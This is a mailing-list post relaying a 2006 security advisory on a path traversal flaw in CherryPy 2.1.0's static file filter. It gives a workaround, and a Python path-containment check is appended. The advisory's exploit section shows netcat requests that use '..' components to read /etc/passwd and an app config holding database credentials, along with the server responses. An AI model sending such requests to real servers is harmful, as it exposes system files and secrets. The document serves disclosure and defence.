On 1/10/06, Kevin Dangoor <[EMAIL PROTECTED]> wrote:
>
> I have just released TurboGears 0.8.8. The only change from 0.8.7 is
> the requirement of CherryPy 2.1.1.
>
> The staticfilter of CherryPy 2.1.0 has a serious security flaw that
> would allow people to retrieve files from "..". You should update as
> soon as possible:
Now that this is out in the open, I might just as well release the security
advisory I've sent to Remi Delon. Perhaps this will convince people they
*really need to upgrade!*

Security Advisory

From:    Ivo van der Wijk / m3r consultancy B.V.
Subject: Security flaw in CherryPy 2.1.0 (and other versions) allows
         read-access to files on server outside configured directory
Date:    2006/01/07

Synopsis
--------

CherryPy is an object-oriented web development framework written in Python.
A flaw in CherryPy 2.1.0 staticfilter.py exists that allows read-access to
any file on the server accessible by CherryPy, including configuration
files, source code for the web application using CherryPy, logfiles, and
so on.

Description
-----------

CherryPy's static filter allows access to static content (i.e. javascript,
css). It's configured using CherryPy's configuration, and should only allow
access to files *under* that specific directory. I.e. the following
configuration:

    [/static]
    staticFilter.on = True
    staticFilter.dir = "static"

will make all files in "static", relative to the root module package,
available, i.e. assuming the webapp is located in /srv/webapp/app1, the
files available under /srv/webapp/app1/static/ will be served as static
files outside of CherryPy's default publishing scheme.

However, the filter does not check if the path contains any ".." path
components that might escape out of this directory, nor does
cherrypy.lib.cptools.serveFile, which is responsible for reading the file.

Version 2.1.0 has been found vulnerable; earlier versions are most likely
vulnerable as well.

Exploit
-------

The following exploit will escape out of the static directory by inserting
sufficient .. path components and will retrieve /etc/passwd:

    [EMAIL PROTECTED]:~$ (echo 'GET /static/../../../../../../../../../../../etc/passwd HTTP/1.0';echo) | nc localhost 8080
    HTTP/1.0 200 OK
    Date: Sat, 07 Jan 2006 15:15:25 GMT
    Server: CherryPy/2.1.0
    Content-Length: 1617
    Content-Type: text/plain
    Last-Modified: Sun, 18 Dec 2005 16:50:04 GMT

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    (...)

The following exploit will retrieve the TurboGears dev.cfg file containing
(for example) database configuration:

    [EMAIL PROTECTED]:~$ (echo 'GET /static/../../dev.cfg HTTP/1.0';echo) | nc localhost 8080
    (...)
    sqlobject.dburi="postgres://username:[EMAIL PROTECTED]/database"
    (...)

Workaround
----------

Disable the static filter using

    staticFilter.on = False

in your CherryPy configuration, or upgrade to CherryPy 2.1.1.

Contact
-------

For further information about this report, please contact:

Ivo van der Wijk / m3r consultancy B.V.
e-mail: ivo <at> m3r.nl
phone:  +31-20-7173155

--
Drs. I.R. van der Wijk / m3r Consultancy B.V.
Linux/Python/Zope/Plone and Open Source solutions
PO-box 51091, 1007 EB Amsterdam, The Netherlands
Email: ivo <at> m3r.nl
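The containment check that the advisory says staticfilter.py and serveFile lack, written out as an added example. This is not CherryPy's code; it is a hypothetical resolver that maps a request under a mount point such as "/static" onto a file below the configured directory and refuses anything that climbs out, including %-encoded ".." and symlinks that point outside the root. The /srv/webapp/app1 layout is the one the advisory assumes.

```python
import os
import posixpath
from urllib.parse import unquote


class StaticPathError(Exception):
    """Request would resolve to a file outside the configured static directory."""


def resolve_static_path(static_root, mount_point, request_path):
    """Map ``request_path`` (e.g. "/static/site.css") onto a file below
    ``static_root``; raise StaticPathError if it would escape that directory.
    Hypothetical hardened check, not CherryPy's own implementation."""
    root = os.path.realpath(static_root)
    if request_path != mount_point and not request_path.startswith(mount_point + "/"):
        raise StaticPathError("request %r not under %r" % (request_path, mount_point))
    # Strip the URL prefix and decode %-escapes (e.g. %2e%2e) *before* normalising;
    # decoding afterwards would let an encoded ".." slip past the check.
    rel = unquote(request_path[len(mount_point):]).lstrip("/")
    # Collapse "." and ".." at the URL level. Any ".." left at the front means the
    # path climbed above the mount point and must be rejected, not silently fixed.
    norm = posixpath.normpath(rel) if rel else "."
    if norm == ".." or norm.startswith("../"):
        raise StaticPathError("path escapes static directory: %r" % request_path)
    # Resolve on the filesystem too, so a symlink inside static/ that points
    # elsewhere is caught by the containment check below.
    candidate = os.path.realpath(os.path.join(root, norm))
    if os.path.commonpath([root, candidate]) != root:
        raise StaticPathError("path escapes static directory: %r" % request_path)
    return candidate


def classify_requests(static_root, mount_point, requests):
    """Return {request_path: 'allowed' | 'rejected'} for the hardened resolver.
    'allowed' means the path stays inside static_root; existence is not checked."""
    verdict = {}
    for req in requests:
        try:
            resolve_static_path(static_root, mount_point, req)
            verdict[req] = "allowed"
        except StaticPathError:
            verdict[req] = "rejected"
    return verdict


if __name__ == "__main__":
    # Constructed sample requests, including the two from the advisory.
    for req, v in classify_requests("/srv/webapp/app1/static", "/static", [
        "/static/site.css", "/static/css/../site.css", "/static/../../dev.cfg",
        "/static/../../../../../../../../../../../etc/passwd",
        "/static/%2e%2e/%2e%2e/dev.cfg"]).items():
        print("%-60s %s" % (req, v))
```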

